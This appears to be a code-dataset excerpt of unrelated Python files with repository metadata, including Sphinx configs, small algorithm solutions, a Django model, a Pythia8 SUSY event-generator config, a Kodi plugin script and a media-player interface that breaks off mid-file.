# The name of the Pygments (syntax highlighting) style to use.
pygments_style = 'sphinx'
# -- Options for HTML output -------------------------------------------------
# The theme to use for HTML and HTML Help pages. See the documentation for
# a list of builtin themes.
#
html_theme = "sphinx_rtd_theme"
# Theme options are theme-specific and customize the look and feel of a theme
# further. For a list of options available for each theme, see the
# documentation.
#
html_theme_options = {
"canonical_url": "https://docs.openstack.org/tobiko/latest/",
"logo_only": False,
"display_version": True,
"prev_next_buttons_location": "top",
"style_external_links": True,
# Toc options
"collapse_navigation": True,
"sticky_navigation": True,
"navigation_depth": 4,
"includehidden": True,
"titles_only": False,
}
# Add any paths that contain custom static files (such as style sheets) here,
# relative to this directory. They are copied after the builtin static files,
# so a file named "default.css" will overwrite the builtin "default.css".
html_static_path = ['_static']
# Custom sidebar templates, must be a dictionary that maps document names
# to template names.
#
# The default sidebars (for documents that don't match any pattern) are
# defined by theme itself. Builtin themes are using these templates by
# default: ``['localtoc.html', 'relations.html', 'sourcelink.html',
# 'searchbox.html']``.
#
# html_sidebars = {}
# -- Options for HTMLHelp output ---------------------------------------------
# Output file base name for HTML help builder.
htmlhelp_basename = 'TobikoReleaseNotesdoc'
# -- Options for LaTeX output ------------------------------------------------
latex_elements = {
# The paper size ('letterpaper' or 'a4paper').
#
# 'papersize': 'letterpaper',
# The font size ('10pt', '11pt' or '12pt').
#
# 'pointsize': '10pt',
# Additional stuff for the LaTeX preamble.
#
# 'preamble': '',
# Latex figure (float) alignment
#
# 'figure_align': 'htbp',
}
# Grouping the document tree into LaTeX files. List of tuples
# (source start file, target name, title,
# author, documentclass [howto, manual, or own class]).
latex_documents = [
(master_doc, 'TobikoReleaseNotes.tex', u'Tobiko Release Notes Documentation',
u'Tobiko developers', 'manual'),
]
# -- Options for manual page output ------------------------------------------
# One entry per manual page. List of tuples
# (source start file, name, description, authors, manual section).
man_pages = [
(master_doc, 'tobikoreleasenotes', u'Tobiko Release Notes Documentation',
[u'Tobiko developers'], 1)
]
# -- Options for Texinfo output ----------------------------------------------
# Grouping the document tree into Texinfo files. List of tuples
# (source start file, target name, title, author,
# dir menu entry, description, category)
texinfo_documents = [
(master_doc, 'TobikoReleaseNotes', u'Tobiko Release Notes Documentation',
u'Tobiko developers', 'TobikoReleaseNotes', 'One line description of project.',
'Miscellaneous'),
]
|
[
"fressi@redhat.com"
] |
fressi@redhat.com
|
cfbde29af5c7d47388410751eaebd45c382e38a4
|
ff3f4b3117847f70fe68741288f28576fe2cc5e3
|
/baekjoon/1712_손익분기점.py
|
7ad98c5c1bd7ff74104ee79698dc45bd51b98083
|
[] |
no_license
|
manuck/myAlgo
|
087bbe99672c40762759e9202fe371c394736fb1
|
c673687d23a2d5cc06b6a6d5fb1bc0cb2e2b7bd9
|
refs/heads/master
| 2021-07-01T00:13:27.590848
| 2020-12-17T18:10:16
| 2020-12-17T18:10:16
| 203,954,477
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,280
|
py
|
import sys
sys.stdin = open('1712_input.txt')
'''
문제
월드전자는 노트북을 제조하고 판매하는 회사이다. 노트북 판매 대수에 상관없이 매년 임대료, 재산세, 보험료, 급여 등 A만원의 고정 비용이 들며, 한 대의 노트북을 생산하는 데에는 재료비와 인건비 등 총 B만원의 가변 비용이 든다고 한다.
예를 들어 A=1,000, B=70이라고 하자. 이 경우 노트북을 한 대 생산하는 데는 총 1,070만원이 들며, 열 대 생산하는 데는 총 1,700만원이 든다.
노트북 가격이 C만원으로 책정되었다고 한다. 일반적으로 생산 대수를 늘려 가다 보면 어느 순간 총 수입(판매비용)이 총 비용(=고정비용+가변비용)보다 많아지게 된다. 최초로 총 수입이 총 비용보다 많아져 이익이 발생하는 지점을 손익분기점(BREAK-EVEN POINT)이라고 한다.
A, B, C가 주어졌을 때, 손익분기점을 구하는 프로그램을 작성하시오.
입력
첫째 줄에 A, B, C가 빈 칸을 사이에 두고 순서대로 주어진다. A, B, C는 21억 이하의 자연수이다.
'''
a, b, c = map(int, input().split())
answer = 0
print(a, b, c)
if b < c:
answer = a // (c-b)+1
else:
answer = -1
print(answer)
|
[
"snc9000@naver.com"
] |
snc9000@naver.com
|
fe6f9e517fa57fa574ad57811ee18bab68c95b8d
|
1243d11e36e61542693fb9a4b187f328aa2eb473
|
/account/models.py
|
6d5ebea9fe2dd56a1a41c1d14b7e00f2ff50f127
|
[] |
no_license
|
LatorreDev/Django-socialNetwork
|
344fa7d4fdee2a136695cdf9be20feaa8a8e8094
|
b15f7a3c13e118d3ce1144784357b44f81c426ac
|
refs/heads/master
| 2022-12-08T23:02:43.221239
| 2020-09-18T01:05:03
| 2020-09-18T01:05:03
| 296,475,039
| 0
| 0
| null | 2020-09-18T01:05:04
| 2020-09-18T00:44:37
| null |
UTF-8
|
Python
| false
| false
| 476
|
py
|
from django.db import models
from django.conf import settings
# Create your models here.
class Profile(models.Model):
user = models.OneToOneField(settings.AUTH_USER_MODEL,
on_delete=models.CASCADE)
date_of_birth = models.DateField(blank=True, null=True)
photo = models.ImageField(upload_to='users/%Y/%m/%d',
blank=True)
def __str__(self):
return f'Profile for user {self.user.username}'
|
[
"niljordan23@gmail.com"
] |
niljordan23@gmail.com
|
0f85e629918d9c10d47d0f02fe53bdb4da9e6d75
|
328ebfdbcef076ce0e930715f9bd786d7498185b
|
/lang/python/learn-python-programming-masterclass/section-3/strings.py
|
91b26393876205c803ac842e2289ac95f64a1bc6
|
[] |
no_license
|
pnowak2/learnjs
|
b618e6f9563b3e86be0b1a21d647698e289daec0
|
f8842b4e9e5d2eae6fb4e0d663b6699d74c90e9c
|
refs/heads/master
| 2023-08-30T05:04:00.227920
| 2023-08-18T10:58:24
| 2023-08-18T10:58:24
| 41,912,571
| 3
| 0
| null | 2023-03-31T06:58:40
| 2015-09-04T11:36:13
|
Python
|
UTF-8
|
Python
| false
| false
| 467
|
py
|
print("Today is a good day")
print('Python is fun')
print("Python's string are easy to use")
print('We can include "quotes" in string')
print("Hello" + " world")
greeting = "Hello, "
# name = input("Please \n enter your name ")
name = "Tim"
# if we want a space, we can add that too
print(greeting + name)
print(greeting + ' ' + name)
age = 24
print(age)
print(type(greeting))
print(type(age))
age_in_words = "2 years"
print(type(age))
print(f'hello {age}')
|
[
"p.nowak2@gmail.com"
] |
p.nowak2@gmail.com
|
41861453f09818f9a2f62d37ff76df50af693824
|
c5a1c95e9d8ce937f71caf8340cf11fe98e64f56
|
/day15/problem2/[노태윤]소수 찾기.py
|
8b5fff7359c78175d22f73d43ea64b2a1a1acb6b
|
[] |
no_license
|
Boot-Camp-Coding-Test/Programmers
|
963e5ceeaa331d99fbc7465f7b129bd68e96eae3
|
83a4b62ba2268a47859a6ce88ae1819bc96dcd85
|
refs/heads/main
| 2023-05-23T08:21:57.398594
| 2021-06-12T16:39:21
| 2021-06-12T16:39:21
| 366,589,317
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,037
|
py
|
from itertools import permutations
def isprime(N) :
if N <= 1 :
return False # 0 또는 1 이면 소수가 아니므로 False 반환
for i in range(2,N) :
if N % i == 0 :
return False # 하나라도 나누어 떨어지면 소수가 아니므로 False 반환
return True # 그 외에는 True 반환 (소수)
def solution(numbers):
answer = 0
total_permutations_list = []
for i in range(1,len(numbers)+1) : # 1부터 numbers 의 length 까지 permutation 진행
permutations_list = list(permutations(numbers,i))
total_permutations_list.extend(list(map(lambda x : int("".join(x)),permutations_list))) # [('1','7') , ('1','3')] 이라고 치면 [17,13] 을 전체 permutation list 에 extend
set_total_permutations_list = set(total_permutations_list) # 중복되는 것이 있을 수도 있으므로 set 로 중복 제거
for i in set_total_permutations_list :
if isprime(i) == True : # 소수면 answer +=1
answer+=1
return answer
|
[
"noreply@github.com"
] |
Boot-Camp-Coding-Test.noreply@github.com
|
a52be8922affd67547e135f801c5f101f05b49af
|
60b2738284ae25231da1b1d91e3b61008c548673
|
/ImageGenerator/generate_image_with_index.py
|
0c4caf197fe57011c8892e239f78338ba67557a7
|
[] |
no_license
|
BhallaLab/Scripts
|
f54eb06693ae0f9de3b41a8ed2adda1da930aa24
|
a5d3a2be92b269590316403b3c6194db020b261a
|
refs/heads/master
| 2021-06-02T21:43:13.374239
| 2019-08-06T05:53:03
| 2019-08-06T05:53:03
| 37,115,228
| 8
| 7
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,025
|
py
|
#!/usr/bin/env python
"""generate_image_with_index.py:
Generates transparent image with numbers written on them. Can be used to
caliberate projectors for frame per seconds.
"""
__author__ = "Dilawar Singh"
__copyright__ = "Copyright 2015, Dilawar Singh and NCBS Bangalore"
__credits__ = ["NCBS Bangalore"]
__license__ = "GNU GPL"
__version__ = "1.0.0"
__maintainer__ = "Dilawar Singh"
__email__ = "dilawars@ncbs.res.in"
__status__ = "Development"
import matplotlib.pyplot as plt
import os
import sys
fontsize = 100
dpi = 96
height = 768.0 / dpi
width = 1024.0 / dpi
if not os.path.exists('_images'):
os.makedirs('_images')
for i in range(1000):
print("Creating image for %s" % i)
fig = plt.figure( figsize=(width, height) )
plt.axis('off')
plt.plot()
plt.figtext(0.4, 0.4, '%s' % i, fontsize=fontsize)
plt.savefig('_images/%s.png' % i, dpi=dpi, transparent=True)
print("[INFO] All images are saved to _images")
|
[
"dilawars@ncbs.res.in"
] |
dilawars@ncbs.res.in
|
2d583075790cb83484032d009a3e8cfe584193d0
|
70e970ce9ec131449b0888388f65f0bb55f098cd
|
/SignalMC/python/pythia8/AMSB_gluinoToChargino_M-1300GeV_M-900GeV_CTau-10cm_TuneCP5_13TeV_pythia8_cff.py
|
adb04714d2ed3a9d54092513fa5a34287cf407ba
|
[] |
no_license
|
OSU-CMS/DisappTrks
|
53b790cc05cc8fe3a9f7fbd097284c5663e1421d
|
1d1c076863a9f8dbd3f0c077d5821a8333fc5196
|
refs/heads/master
| 2023-09-03T15:10:16.269126
| 2023-05-25T18:37:40
| 2023-05-25T18:37:40
| 13,272,469
| 5
| 12
| null | 2023-09-13T12:15:49
| 2013-10-02T13:58:51
|
Python
|
UTF-8
|
Python
| false
| false
| 8,096
|
py
|
COM_ENERGY = 13000.
MGLU = 1300 # GeV
MCHI = 900 # GeV
CTAU = 100 # mm
CROSS_SECTION = 0.0522 # pb
SLHA_TABLE="""
# ISAJET SUSY parameters in SUSY Les Houches Accord 2 format
# Created by ISALHA 2.0 Last revision: C. Balazs 21 Apr 2009
Block SPINFO # Program information
1 ISASUGRA from ISAJET # Spectrum Calculator
2 7.80 29-OCT-2009 12:50:36 # Version number
Block MODSEL # Model selection
1 3 # Minimal anomaly mediated (AMSB) model
Block SMINPUTS # Standard Model inputs
1 1.27836258E+02 # alpha_em^(-1)
2 1.16570000E-05 # G_Fermi
3 1.17200002E-01 # alpha_s(M_Z)
4 9.11699982E+01 # m_{Z}(pole)
5 4.19999981E+00 # m_{b}(m_{b})
6 1.73070007E+02 # m_{top}(pole)
7 1.77699995E+00 # m_{tau}(pole)
Block MINPAR # SUSY breaking input parameters
1 1.50000000E+03 # m_0
2 3.20160000E+05 # m_{3/2}
3 5.00000000E+00 # tan(beta)
4 1.00000000E+00 # sign(mu)
Block EXTPAR # Non-universal SUSY breaking parameters
0 9.63624875E+15 # Input scale
Block MASS # Scalar and gaugino mass spectrum
# PDG code mass particle
24 8.04229965E+01 # W^+
25 1.17885536E+02 # h^0
35 5.14209375E+03 # H^0
36 5.10833789E+03 # A^0
37 5.12604248E+03 # H^+
1000001 5.84499561E+03 # dnl
1000002 5.84445264E+03 # upl
1000003 5.84499561E+03 # stl
1000004 5.84445264E+03 # chl
1000005 5.11084131E+03 # b1
1000006 4.26797754E+03 # t1
1000011 8.44497009E+02 # el-
1000012 7.82294617E+02 # nuel
1000013 8.44497009E+02 # mul-
1000014 7.82294617E+02 # numl
1000015 4.59390961E+02 # tau1
1000016 7.43124634E+02 # nutl
1000021 %.9g # glss
1000022 8.99857849E+02 # z1ss
1000023 2.96498828E+03 # z2ss
1000024 9.00032288E+02 # w1ss
1000025 -4.94443994E+03 # z3ss
1000035 4.94548633E+03 # z4ss
1000037 4.95200684E+03 # w2ss
2000001 5.94409229E+03 # dnr
2000002 5.88074072E+03 # upr
2000003 5.94409229E+03 # str
2000004 5.88074072E+03 # chr
2000005 5.89824365E+03 # b2
2000006 5.15734326E+03 # t2
2000011 4.41901886E+02 # er-
2000013 4.41901886E+02 # mur-
2000015 7.75092834E+02 # tau2
Block ALPHA # Effective Higgs mixing parameter
-1.97571859E-01 # alpha
Block STOPMIX # stop mixing matrix
1 1 6.91948459E-02 # O_{11}
1 2 -9.97603178E-01 # O_{12}
2 1 9.97603178E-01 # O_{21}
2 2 6.91948459E-02 # O_{22}
Block SBOTMIX # sbottom mixing matrix
1 1 9.99987841E-01 # O_{11}
1 2 4.92899446E-03 # O_{12}
2 1 -4.92899446E-03 # O_{21}
2 2 9.99987841E-01 # O_{22}
Block STAUMIX # stau mixing matrix
1 1 9.16852951E-02 # O_{11}
1 2 9.95788038E-01 # O_{12}
2 1 -9.95788038E-01 # O_{21}
2 2 9.16852951E-02 # O_{22}
Block NMIX # neutralino mixing matrix
1 1 -7.91596598E-04 #
1 2 9.99869168E-01 #
1 3 -1.56042408E-02 #
1 4 4.20085900E-03 #
2 1 9.99881387E-01 #
2 2 1.02774356E-03 #
2 3 1.28675103E-02 #
2 4 -8.40762258E-03 #
3 1 -3.16098332E-03 #
3 2 8.06056987E-03 #
3 3 7.07025349E-01 #
3 4 7.07135558E-01 #
4 1 1.50564853E-02 #
4 2 -1.39906351E-02 #
4 3 -7.06899285E-01 #
4 4 7.07015812E-01 #
Block UMIX # chargino U mixing matrix
1 1 -9.99734461E-01 # U_{11}
1 2 2.30428278E-02 # U_{12}
2 1 -2.30428278E-02 # U_{21}
2 2 -9.99734461E-01 # U_{22}
Block VMIX # chargino V mixing matrix
1 1 -9.99961317E-01 # V_{11}
1 2 8.79876781E-03 # V_{12}
2 1 -8.79876781E-03 # V_{21}
2 2 -9.99961317E-01 # V_{22}
Block GAUGE Q= 4.47923682E+03 #
1 3.57524991E-01 # g`
2 6.52378619E-01 # g_2
3 1.21928000E+00 # g_3
Block YU Q= 4.47923682E+03 #
3 3 8.32892656E-01 # y_t
Block YD Q= 4.47923682E+03 #
3 3 6.45801947E-02 # y_b
Block YE Q= 4.47923682E+03 #
3 3 5.14558963E-02 # y_tau
Block HMIX Q= 4.47923682E+03 # Higgs mixing parameters
1 4.95111182E+03 # mu(Q)
2 5.00000000E+00 # tan(beta)(M_GUT)
3 2.51892105E+02 # Higgs vev at Q
4 2.60951160E+07 # m_A^2(Q)
Block MSOFT Q= 4.47923682E+03 # DRbar SUSY breaking parameters
1 3.00553760E+03 # M_1(Q)
2 8.59459534E+02 # M_2(Q)
3 -5.73397852E+03 # M_3(Q)
31 7.99010315E+02 # MeL(Q)
32 7.99010315E+02 # MmuL(Q)
33 7.61961365E+02 # MtauL(Q)
34 5.51579651E+02 # MeR(Q)
35 5.51579651E+02 # MmuR(Q)
36 3.78081726E+02 # MtauR(Q)
41 5.55658252E+03 # MqL1(Q)
42 5.55658252E+03 # MqL2(Q)
43 4.88496289E+03 # MqL3(Q)
44 5.59192773E+03 # MuR(Q)
45 5.59192773E+03 # McR(Q)
46 4.10720898E+03 # MtR(Q)
47 5.65382471E+03 # MdR(Q)
48 5.65382471E+03 # MsR(Q)
49 5.68008496E+03 # MbR(Q)
Block AU Q= 4.47923682E+03 #
1 1 4.93593066E+03 # A_u
2 2 4.93593066E+03 # A_c
3 3 4.93593066E+03 # A_t
Block AD Q= 4.47923682E+03 #
1 1 1.17858047E+04 # A_d
2 2 1.17858047E+04 # A_s
3 3 1.17858047E+04 # A_b
Block AE Q= 4.47923682E+03 #
1 1 3.34377515E+03 # A_e
2 2 3.34377515E+03 # A_mu
3 3 3.34377515E+03 # A_tau
#
#
#
# =================
# |The decay table|
# =================
#
# PDG Width
DECAY 1000021 5.50675438E+00 # gluino decay
# BR NDA ID1 ID2 ID3
2.50000000E-01 3 1 -1 1000022
2.50000000E-01 3 2 -2 1000022
2.50000000E-01 3 1 -2 1000024
2.50000000E-01 3 -1 2 -1000024
#
# PDG Width
DECAY 1000024 %.9g # chargino decay
#
""" % (MGLU, (1.97326979e-13 / CTAU))
import FWCore.ParameterSet.Config as cms
from Configuration.Generator.Pythia8CommonSettings_cfi import *
from Configuration.Generator.MCTunes2017.PythiaCP5Settings_cfi import *
generator = cms.EDFilter("Pythia8GeneratorFilter",
pythiaPylistVerbosity = cms.untracked.int32(0),
filterEfficiency = cms.untracked.double(-1),
pythiaHepMCVerbosity = cms.untracked.bool(False),
SLHATableForPythia8 = cms.string('%s' % SLHA_TABLE),
comEnergy = cms.double(COM_ENERGY),
crossSection = cms.untracked.double(CROSS_SECTION),
maxEventsToPrint = cms.untracked.int32(0),
PythiaParameters = cms.PSet(
pythia8CommonSettingsBlock,
pythia8CP5SettingsBlock,
processParameters = cms.vstring(
'SUSY:all = off',
'SUSY:gg2gluinogluino = on',
'SUSY:qqbar2gluinogluino = on',
'1000024:isResonance = false',
'1000024:oneChannel = 1 1.0 100 1000022 211',
'1000024:tau0 = %.1f' % CTAU,
'ParticleDecays:tau0Max = %.1f' % (CTAU * 10),
),
parameterSets = cms.vstring(
'pythia8CommonSettings',
'pythia8CP5Settings',
'processParameters')
),
# The following parameters are required by Exotica_HSCP_SIM_cfi:
slhaFile = cms.untracked.string(''), # value not used
processFile = cms.untracked.string('SimG4Core/CustomPhysics/data/RhadronProcessList.txt'),
useregge = cms.bool(False),
hscpFlavor = cms.untracked.string('stau'),
massPoint = cms.untracked.int32(MCHI), # value not used
particleFile = cms.untracked.string('Configuration/GenProduction/python/ThirteenTeV/DisappTrksAMSBCascade/test/geant4_AMSB_chargino_%sGeV_ctau%scm.slha' % (MCHI, CTAU/10))
)
ProductionFilterSequence = cms.Sequence(generator)
|
[
"ahart@cern.ch"
] |
ahart@cern.ch
|
758ddeec7b172f7f1236be16322795bec7ad6325
|
e7263026bd4f34bae664c37e57a299ce83c7f111
|
/03-Spider/scrapy-spider/xiciIPSpider/xiciIPSpider/items.py
|
06d00e44d6c499c8beabdb1eace42bc540d723ca
|
[] |
no_license
|
Aries000004/grocery
|
34d0ad0648c6dff5c36f4a68abf9eeac59da214d
|
27492f4ac7ef66d544f853dd6686920bcb9dc663
|
refs/heads/master
| 2020-03-24T22:50:37.703257
| 2018-07-26T11:43:54
| 2018-07-26T11:43:54
| 143,105,389
| 1
| 0
| null | 2018-08-01T04:51:12
| 2018-08-01T04:51:12
| null |
UTF-8
|
Python
| false
| false
| 292
|
py
|
# -*- coding: utf-8 -*-
# Define here the models for your scraped items
#
# See documentation in:
# https://doc.scrapy.org/en/latest/topics/items.html
import scrapy
class XiciipspiderItem(scrapy.Item):
# define the fields for your item here like:
# name = scrapy.Field()
pass
|
[
"1367000465@qq.com"
] |
1367000465@qq.com
|
0bb427439c4a8a56d195361c85fb14868b964517
|
f508e4a751d3dfadd268794fd6092b3781a74d4c
|
/docs/conf.py
|
090e77a6ac8479a9a127eddbd3cf278fac9292ef
|
[
"MIT"
] |
permissive
|
mildewey/higlass
|
c2e274e0bdafccbfe5e994b8992248ae806e82fd
|
8cc135017500216cb24b98c3c82d85ca861081b1
|
refs/heads/master
| 2020-04-02T19:26:31.670874
| 2018-10-19T16:05:30
| 2018-10-19T16:05:30
| 154,734,076
| 0
| 0
| null | 2018-10-25T20:34:59
| 2018-10-25T20:34:59
| null |
UTF-8
|
Python
| false
| false
| 5,306
|
py
|
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
#
# higlass documentation build configuration file, created by
# sphinx-quickstart on Mon Jul 3 16:40:45 2017.
#
# This file is execfile()d with the current directory set to its
# containing dir.
#
# Note that not all possible configuration values are present in this
# autogenerated file.
#
# All configuration values have a default; values that are commented out
# serve to show the default.
# If extensions (or modules to document with autodoc) are in another directory,
# add these directories to sys.path here. If the directory is relative to the
# documentation root, use os.path.abspath to make it absolute, like shown here.
#
# import os
# import sys
# sys.path.insert(0, os.path.abspath('.'))
# -- General configuration ------------------------------------------------
# If your documentation needs a minimal Sphinx version, state it here.
#
# needs_sphinx = '1.0'
# Add any Sphinx extension module names here, as strings. They can be
# extensions coming with Sphinx (named 'sphinx.ext.*') or your custom
# ones.
extensions = ['sphinx.ext.viewcode', 'sphinx.ext.imgmath', 'sphinx.ext.todo']
# Add any paths that contain templates here, relative to this directory.
templates_path = ['_templates']
# The suffix(es) of source filenames.
# You can specify multiple suffix as a list of string:
#
# source_suffix = ['.rst', '.md']
source_suffix = '.rst'
# The master toctree document.
master_doc = 'index'
# General information about the project.
project = 'HiGlass'
copyright = '2017,2018 HiGlass Authors'
author = 'HiGlass Authors'
# The version info for the project you're documenting, acts as replacement for
# |version| and |release|, also used in various other places throughout the
# built documents.
#
# The short X.Y version.
version = 'v1.0'
# The full version, including alpha/beta/rc tags.
release = 'v1.0'
# The language for content autogenerated by Sphinx. Refer to documentation
# for a list of supported languages.
#
# This is also used if you do content translation via gettext catalogs.
# Usually you set "language" from the command line for these cases.
language = None
# List of patterns, relative to source directory, that match files and
# directories to ignore when looking for source files.
# This patterns also effect to html_static_path and html_extra_path
exclude_patterns = ['_build', 'Thumbs.db', '.DS_Store']
# The name of the Pygments (syntax highlighting) style to use.
pygments_style = 'sphinx'
# If true, `todo` and `todoList` produce output, else they produce nothing.
todo_include_todos = False
# -- Options for HTML output ----------------------------------------------
# The theme to use for HTML and HTML Help pages. See the documentation for
# a list of builtin themes.
#
html_theme = 'higlass_theme'
html_theme_path= ["."]
# Theme options are theme-specific and customize the look and feel of a theme
# further. For a list of options available for each theme, see the
# documentation.
#
html_theme_options = {
"sidebar_collapse": False
}
# Add any paths that contain custom static files (such as style sheets) here,
# relative to this directory. They are copied after the builtin static files,
# so a file named "default.css" will overwrite the builtin "default.css".
html_static_path = ['_static']
# Custom sidebar templates, must be a dictionary that maps document names
# to template names.
#
# This is required for the alabaster theme
# refs: http://alabaster.readthedocs.io/en/latest/installation.html#sidebars
html_sidebars = {
'**': [
'about.html',
'navigation.html',
'relations.html', # needs 'show_related': True theme option to display
'searchbox.html',
'donate.html',
]
}
# -- Options for HTMLHelp output ------------------------------------------
# Output file base name for HTML help builder.
htmlhelp_basename = 'higlassdoc'
# -- Options for LaTeX output ---------------------------------------------
latex_elements = {
# The paper size ('letterpaper' or 'a4paper').
#
# 'papersize': 'letterpaper',
# The font size ('10pt', '11pt' or '12pt').
#
# 'pointsize': '10pt',
# Additional stuff for the LaTeX preamble.
#
# 'preamble': '',
# Latex figure (float) alignment
#
# 'figure_align': 'htbp',
}
# Grouping the document tree into LaTeX files. List of tuples
# (source start file, target name, title,
# author, documentclass [howto, manual, or own class]).
latex_documents = [
(master_doc, 'higlass.tex', 'HiGlass Documentation',
'Peter Kerpedjiev', 'manual'),
]
# -- Options for manual page output ---------------------------------------
# One entry per manual page. List of tuples
# (source start file, name, description, authors, manual section).
man_pages = [
(master_doc, 'higlass', 'HiGlass Documentation',
[author], 1)
]
# -- Options for Texinfo output -------------------------------------------
# Grouping the document tree into Texinfo files. List of tuples
# (source start file, target name, title, author,
# dir menu entry, description, category)
texinfo_documents = [
(master_doc, 'higlass', 'HiGlass Documentation',
author, 'HiGlass', 'A visual explorer for large genomic data.',
'Miscellaneous'),
]
|
[
"pkerpedjiev@gmail.com"
] |
pkerpedjiev@gmail.com
|
2285b70ca377c6f1d7352094d1f626929e63df89
|
c21546695e35a3f7c60e684de04bcbe88b2b985a
|
/0191_Number_of_1_Bits.py
|
c55f7da2b0e4f58f2b0605fc72f4ee8b7757bcc1
|
[] |
no_license
|
piecesofreg09/study_leetcode
|
4a05ddee44c72a6d0c50bca7cb0b70abd33b0b85
|
fc69721dbe003fcc2f7795a6b38c41d877905205
|
refs/heads/master
| 2023-01-14T05:02:24.779136
| 2020-11-18T17:23:30
| 2020-11-18T17:23:30
| 288,774,420
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 234
|
py
|
'''
n & n - 1 will remove the rightmost 1 to be 0
'''
class Solution:
def hammingWeight(self, n: int) -> int:
count = 0
while n != 0:
count += 1
n = n & n - 1
return count
|
[
"noreply@github.com"
] |
piecesofreg09.noreply@github.com
|
186aad5955392fda1d645d2081f56cfc70054898
|
9b9fa48ec458fec2b451b3be54bf2be23188b11e
|
/labs/functions/character_permutations.py
|
08fb258bbbda4e629cb991a9d908bb5c6e327b6c
|
[] |
no_license
|
Nikoletazl/Advanced-Python
|
1bc55ce42693ff0a5bcf082f9f7867e07b771007
|
f1e31fbd423b31e2b24db151df8b73c7eaf35ab5
|
refs/heads/main
| 2023-08-21T20:46:43.572803
| 2021-10-22T09:47:52
| 2021-10-22T09:47:52
| 415,001,443
| 1
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 337
|
py
|
def permute(index, values):
if index == len(values):
print("".join(values))
return
for i in range(index, len(values)):
values[i], values[index] = values[index], values[i]
permute(index + 1, values)
values[i], values[index] = values[index], values[i]
permute(0, list(input()))
|
[
"noreply@github.com"
] |
Nikoletazl.noreply@github.com
|
cc4a17a7174b8409f4875d4c7fce223c8ee00a2d
|
cd486d096d2c92751557f4a97a4ba81a9e6efebd
|
/18/addons/context.venom/playFromHere.py
|
887d841b3746e04a0b3b31161b57f8631de3a007
|
[] |
no_license
|
bopopescu/firestick-loader-kodi-data
|
2f8cb72b9da67854b64aa76f720bdad6d4112926
|
e4d7931d8f62c94f586786cd8580108b68d3aa40
|
refs/heads/master
| 2022-04-28T11:14:10.452251
| 2020-05-01T03:12:13
| 2020-05-01T03:12:13
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,874
|
py
|
import sys, xbmc, json
try:
from urlparse import parse_qsl
from urllib import quote_plus
except:
from urllib.parse import parse_qsl, quote_plus
xbmc.log('__name__= %s' % __name__, 2)
xbmc.log('__package__= %s' % __package__, 2)
# sys.path = []
# if __name__ == '__main__' and __package__ is None:
# from os import sys, path
# test = sys.path.append(path.dirname(path.dirname(path.abspath(__file__))))
# xbmc.log('test= %s' % test, 2)
if __name__ == '__main__':
item = sys.listitem
message = item.getLabel()
path = item.getPath()
xbmc.log('path = %s' % path, 2)
plugin = 'plugin://plugin.video.venom/'
args = path.split(plugin, 1)
xbmc.log('args = %s' % args, 2)
params = dict(parse_qsl(args[1].replace('?', '')))
xbmc.log('playlist = %s' % len(xbmc.PlayList(xbmc.PLAYLIST_VIDEO)), 2)
if 'meta' in params:
meta = json.loads(params['meta'])
year = meta.get('year', '')
imdb = meta.get('imdb', '')
tmdb = meta.get('tmdb', '')
tvdb = meta.get('tvdb', '')
season = meta.get('season', '')
episode = meta.get('episode', '')
tvshowtitle = meta.get('tvshowtitle', '')
else:
year = params.get('year', '')
imdb = params.get('imdb', '')
tmdb = params.get('tmdb', '')
tvdb = params.get('tvdb', '')
season = params.get('season', '')
episode = params.get('episode', '')
tvshowtitle = params.get('tvshowtitle', '')
# items = seasons.Seasons().tvdb_list(item['tvshowtitle'], item['year'], item['imdb'], item['tmdb'], item['tvdb'], control.apiLanguage()['tvdb'], '-1') # fetch new meta (uncached)
# for item in items:
# path = '%s?action=episodes&tvshowtitle=%s&year=%s&imdb=%s&tmdb=%s&tvdb=%s&season=%s&episode=%s' % (
# plugin, tvshowtitle, year, imdb, tmdb, tvdb, season, episode)
# path = 'PlayMedia(%s?action=playAll)' % plugin
path = 'RunPlugin(%s?action=playAll)' % plugin
xbmc.executebuiltin(path)
|
[
"esc0rtd3w@gmail.com"
] |
esc0rtd3w@gmail.com
|
c31e659110b66300d3a5f2982f28690d73a5c462
|
4ed3db861ae2fe727c7be604d42d540a00923320
|
/samsung_multiroom/service/player.py
|
68cf53039187d62a94f10fb1ba54dd7a7eac1581
|
[
"MIT"
] |
permissive
|
kusma/samsung_multiroom
|
7cac147283a52bf491d7f50a6569c64de53eb4a5
|
09ca86d27b87a4aa0c97ec2accbd4ec67dd0cc61
|
refs/heads/master
| 2020-12-04T07:46:19.688568
| 2019-04-20T16:29:44
| 2019-04-20T16:29:44
| 231,683,383
| 0
| 0
|
MIT
| 2020-01-03T23:47:29
| 2020-01-03T23:47:28
| null |
UTF-8
|
Python
| false
| false
| 6,225
|
py
|
"""Player allows playback control depending on selected source."""
import abc
# repeat mode constants
REPEAT_ONE = 'one'
REPEAT_ALL = 'all'
REPEAT_OFF = 'off'
class Player(metaclass=abc.ABCMeta):
"""Player interface to control playback functions."""
@abc.abstractmethod
def play(self, playlist):
"""
Enqueue and play a playlist.
Player may choose to not play the playlist if it's not compatible with this player. For instance you can't
play DLNA source tracks using TuneIn player. If player is unable to play the playlist it must return False.
:param playlist: Iterable returning player combatible objects
:returns: True if playlist was accepted, False otherwise
"""
raise NotImplementedError()
@abc.abstractmethod
def jump(self, time):
"""
Advance current playback to specific time.
:param time: Time from the beginning of the track in seconds
"""
raise NotImplementedError()
@abc.abstractmethod
def resume(self):
"""Play/resume current track."""
raise NotImplementedError()
@abc.abstractmethod
def stop(self):
"""Stop current track and reset position to the beginning."""
raise NotImplementedError()
@abc.abstractmethod
def pause(self):
"""Pause current track and retain position."""
raise NotImplementedError()
@abc.abstractmethod
def next(self):
"""Play next track in the queue."""
raise NotImplementedError()
@abc.abstractmethod
def previous(self):
"""Play previous track in the queue."""
raise NotImplementedError()
@abc.abstractmethod
def repeat(self, mode):
"""
Set playback repeat mode.
:param mode: one of REPEAT_* constants
"""
raise NotImplementedError()
@abc.abstractmethod
def shuffle(self, enabled):
"""
Enable/disable playback shuffle mode.
:param enabled: True to enable, False to disable
"""
raise NotImplementedError()
@abc.abstractmethod
def get_repeat(self):
"""
Get playback repeat mode.
:returns: one of REPEAT_* constants
